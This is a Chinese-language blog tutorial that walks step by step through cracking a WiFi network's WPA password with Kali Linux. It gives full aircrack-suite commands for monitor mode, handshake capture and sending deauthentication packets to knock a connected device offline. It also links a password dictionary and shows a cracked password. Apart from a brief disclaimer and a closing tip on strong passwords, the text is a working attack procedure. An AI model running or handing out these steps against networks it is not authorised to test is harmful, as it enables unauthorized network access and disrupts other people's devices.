[RainBowText]此文章仅做学习交流,请自觉遵守法律法规。[/RainBowText]

1.准备环境

1) vmware
2) kali linux虚拟机
3) 支持监听的无线网卡

2.设置网卡

插入无线网卡-点击vmware菜单栏虚拟机-可移动设备-选择无线网卡,并连接。
wifi破解
打开kali,打开终端-输入ifconfig,显示wlan0网口,表示无线网卡接入成功。
wifi破解
设置网卡监听模式

airmon-ng start wlan0

再次输入ipconfig,此时网卡wlan0变为wlan0mon

3.抓取握手包破解

1) 扫描周围的wifi信号

airodump-ng wlan0mon

wifi破解

BSSID是ap(access point)的mac地址,在这里ap为路由器。
PWR代表信号水平,信号只越高说明距离越近,但是注意,-1值说明无法监听。
CH表示工作的信道号 ENC表示算法加密体系
CIPHER表示检测到的加密算法 AUTH表示认证协议 ESSID即ssid号,wifi的名称
STSTION表示客户端的mac地址(ctrl-c停止扫描)
2) 抓取握手包

airodump-ng -c 1 --ivs -w test --bssid 30:FC:xx:42:41:D6 wlan0mon

参数详解:

-c 选取信道号(扫描wifi时CH栏的值)
--ivs -w test 保存ivs格式的包(这里名称为test )
--bssid 要破解ap的ssid(扫描时BSSID栏的mac地址)
最后是使用的网卡名
wifi破解
[RainBowText]注意:[/RainBowText]
这里抓取的数据包,是连接wifi时的认证包,所以当抓取时没有设备连接,就抓不到这个数据包。
这里利用aireplay-ng工具,强制用户断开wifi
原理:
aireplay-ng工具给连接到此wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。
aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备。从上图可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。
3) 发送反认证包(再开一个终端)

aireplay-ng -0 10 -a 30:FC:xx:42:41:D6-c 90:F0:xx:70:F7:13 wlan0mon

参数详解:

-0 指定反认证包的个数
-a 指定wifi网关的mac地址
-c 指定强制断开的设备

[RainBowText]注:反认证时,要持续抓取数据包,当出现下图红框的内容时(mac地址是wifi网关的mac地址),说明抓取认证包成功。[/RainBowText]
wifi破解
4) ls查看是否抓取成功
wifi破解
这里的test-01.ivstest-05.ivs就是抓取的数据包
5) 破解wifi数据包
这里分享几个wifi字典

此处内容需要评论回复后(审核通过)方可阅读。
">https://gitee.com/r3387/wenyu/raw/master/%E7%A0%B4%E8%A7%A3wifi/passwd.zip[/hide]

aircrack-ng -w paswd.txt test-01.ivs

参数详解:

-w 指定密码字典
最后是wifi数据包(这几个包可能有的不含认证包,所以每个包都试一下)
wifi破解
这里,跑到了密码为369369++..
尝试连接成功。。。。。
关闭无线网卡的监听模式

airmon-ng stop wlan0mon

[RainBowText]注:
这里破解成功的几率完全靠密码字典强大程度,如果字典里没有真正的密码,那是肯定跑不出来的。所以在公共场合或在家里,设置wifi密码强度一定要高,以免黑阔被利用。[/RainBowText]

最后修改:2021 年 06 月 04 日 09 : 38 AM
如果觉得我的文章对你有用,请随意赞赏